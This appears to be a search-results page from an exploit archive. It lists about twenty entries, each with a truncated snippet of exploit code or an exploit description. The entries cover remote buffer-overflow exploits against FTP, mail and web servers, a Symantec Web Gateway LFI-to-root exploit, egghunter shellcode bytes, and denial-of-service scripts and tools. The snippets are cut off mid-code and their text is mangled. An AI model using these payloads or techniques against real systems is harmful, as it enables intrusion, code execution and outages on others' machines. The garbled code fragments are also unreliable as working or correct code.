186 matches found
Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit
No description provided by source. !/usr/bin/python Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. muts at offensive-security dot com import socket import base64 payload= '''echo...
[GoldenEye v2.0] DoS Tool
GoldenEye is a HTTP/S Layer 7 Denial-of-Service Testing Tool. It uses KeepAlive and Connection: keep-alive paired with Cache-Control options to persist socket connection busting through caching when possible until it consumes all available sockets on the HTTP/S server. Usage USAGE: ./goldeneye.py...
PCMAN FTP 2.07 STOR Command - Buffer Overflow Exploit
Exploit for windows platform in category remote exploits !/usr/bin/python Exploit Title: PCMAN FTP 2.07 STOR Command - buffer overflow Date: 18 Agosto 2013 Exploit Author: Christian Polunchis Ramirez https://intrusionlabs.org Contact: email protected Version: PCMAN FTP 2.07 STOR Command Tested on...
Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF
Exploit for windows platform in category remote exploits !/usr/bin/python import socket import os import sys target="192.168.1.16" W00T egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"94...
MinaliC Webserver 2.0.0 Buffer Overflow
!/usr/bin/env python Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 Tested on: Windows XP Pro SP2, English Description: Remote command...
Serva 2.0.0 - HTTP Server GET Remote Denial of Service
Serva 2.0.0 - HTTP Server GET Remote Denial of Service !/usr/bin/python Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability Version: v2.0.0 Date: 2013-01-14 Author: Julien Ahrens @MrTuxracer Homepage: www.inshell.net Software Link: http://www.vercot.com Tested on:...
Serva 2.0.0 - HTTP Server GET Remote Denial of Service
!/usr/bin/python Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability Version: v2.0.0 Date: 2013-01-14 Author: Julien Ahrens @MrTuxracer Homepage: www.inshell.net Software Link: http://www.vercot.com Tested on: Windows XP SP3 Professional German Notes: Malformed GET...
Notes dog a pittance latest injection vulnerability-vulnerability warning-the black bar safety net
/modules/ajax/topic.mod.php function Picajax //echo 1 1; //echo base64encodeserializearray'a'='0''; $options = array; $TopicListLogic = Load::logic'topiclist', 1; $perpagenum = $this-Post'ppnum' ? int$this-Post'ppnum' : 2 0; $cachetime = $this-Post'ctime' ? int$this-Post'ctime' : 1 0; $uid =...
MailMax 4.6 - POP3 'USER' Remote Buffer Overflow
!/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffer += "\xEB\x06\x90\x90" Short jmp 6 bytes buffe...
BIG-Ant-Server
BigAnt Server 2.52 remote buffer overflow exploit suffer because it fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will...
NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
Exploit for windows platform in category dos / poc Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow ASLR Bypass Date: 02/12/11 Author: Zune - Julian Pulido Software Link: http://www.njstar.com/download/njcom.exe Version: 3.0 Build: 11818 and previous Tested on: Windows 7 Ultimate...
DEBIAN-CVE-2011-1159
acpid.c in acpid before 2.0.9 does not properly handle a situation in which a process has connected to acpid.socket but is not reading any data, which allows local users to cause a denial of service daemon hang via a crafted application that performs a connect system call but no read system calls...
Bison-FTP-Server
BisonFTP Server v3.5 Remote Buffer Overflow Exploit Newer version's not tested, maybe vulnerable too ToDo: Add execute shell ToDo: Test vulnerable targets from socket import import sys, struct, os, time if lensys.argv \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to...
HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution
HP Data Protector Client 6.11 - EXECCMD Remote Code Execution Exploit Title: HP Data Protector Client EXECCMD Remote Code Execution Vulnerability PoC ZDI-11-055 Date: 2011-05-28 Author: @fdiskyou e-mail: rui at deniable.org Version: 6.11 Tested on: Windows 2003 Server SP2 en CVE: CVE-2011-0923...
Bopup-Com-Server
Bopup Communications Server 3.2.26.5460 Remote BOF Exploit SEH fails to perform adequate boundary-checks. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service...
Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution
!/usr/bin/python Concrete CMS v5.4.1.1 xss/remote code execution exploit Download: http://www.concrete5.org/ Special Zeitgeist pre release - "Moving Forward" - 15th Jan 2011 "They must find it difficult, those who take authority as the truth instead of truth as the authority"...
Xynph FTP Server 1.0 - USER Denial of Service
Xynph FTP Server 1.0 - USER Denial of Service Exploit Title: Xynph 1.0 USER Denial of Service Exploit Date: 04.01.2011 Author: freakout Version: 1.0 Tested on: Windows XP SP3 Type: DOS/POC Greetings: anco, mahjong, puddy, st!x, war10ck, fraggle, DarthShredder, krzym, starslayer, db E-Mail:...
Freefloat FTP Server - Remote Buffer Overflow
Freefloat FTP Server - Remote Buffer Overflow Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability Date: 12/05/2010 Author: 0v3r Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python import socket import sys def...
Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution
Application: PRL Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution Vulnerability Platforms: Linux Exploitation: Remote code execution CVE Number: Pending Novell TID: 7007151 ZeroDayInitiative: ZDI-10-242 Author: Francis Provencher Protek Research Lab's Blog:...
Mereo 1.9.2 - Remote HTTP Server Denial of Service
Mereo 1.9.2 - Remote HTTP Server Denial of Service !/usr/bin/python Title: Mereo v1.9.2 Remote HTTP Server DoS 0day By: CwG GeNiuS Email: cwggenius at gmail dot com Tested: XPSP3 Download: http://www.ohloh.net/p/mereo import socket, sys payload ="GET /"; payload+="X" 10000; payload+="...